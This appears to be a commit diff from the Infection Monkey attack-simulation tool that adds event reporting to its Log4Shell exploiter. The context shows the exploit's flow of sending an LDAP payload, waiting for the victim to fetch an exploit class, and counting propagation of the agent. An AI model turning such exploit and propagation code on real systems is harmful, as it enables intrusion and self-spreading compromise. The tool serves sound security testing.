p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Publish Propagation and Exploitation events from Log4Shell

This commit is contained in:
Ilija Lazoroski 2022-10-04 13:25:23 +02:00
parent e2453e481c
commit c5506f98e8
1 changed files with 25 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
monkey/infection_monkey/exploit/log4shell.py
View File

@ -39,6 +39,10 @@ class Log4ShellExploiter(WebRCE):
if not self._open_ports: if not self._open_ports:
logger.info("Could not find any open web ports to exploit") logger.info("Could not find any open web ports to exploit")
self._publish_exploitation_event(
target=self.host.ip_addr,
exploitation_success=False,
)
return self.exploit_result return self.exploit_result
self._configure_servers() self._configure_servers()
@ -115,7 +119,9 @@ class Log4ShellExploiter(WebRCE):
def _build_command(self, path: PurePath, http_path) -> str: def _build_command(self, path: PurePath, http_path) -> str:
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline(self.servers, self.current_depth + 1, location=path) monkey_cmd = build_monkey_commandline(
self.servers, self.current_depth + 1, location=str(path)
)
if self.host.is_windows(): if self.host.is_windows():
base_command = LOG4SHELL_WINDOWS_COMMAND base_command = LOG4SHELL_WINDOWS_COMMAND
else: else:
@ -147,10 +153,16 @@ class Log4ShellExploiter(WebRCE):
) )
try: try:
url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port) url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
except Exception as ex: except Exception as err:
logger.warning( error_message = "An error occurred while attempting to exploit log4shell on a "
"An error occurred while attempting to exploit log4shell on a " f"potential {exploit.service_name} service: {err}"
f"potential {exploit.service_name} service: {ex}"
logger.warning(error_message)
self._publish_exploitation_event(
target=self.host.ip_addr,
exploitation_success=False,
error_message=error_message,
) )
if self._wait_for_victim(): if self._wait_for_victim():
@ -173,6 +185,10 @@ class Log4ShellExploiter(WebRCE):
while not timer.is_expired(): while not timer.is_expired():
if self._exploit_class_http_server.exploit_class_downloaded(): if self._exploit_class_http_server.exploit_class_downloaded():
self._publish_exploitation_event(
target=self.host.ip_addr,
exploitation_success=True,
)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
return True return True
@ -187,6 +203,10 @@ class Log4ShellExploiter(WebRCE):
while not timer.is_expired(): while not timer.is_expired():
if self._agent_http_server_thread.downloads > 0: if self._agent_http_server_thread.downloads > 0:
self._publish_propagation_event(
target=self.host.ip_addr,
propagation_success=True,
)
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
break break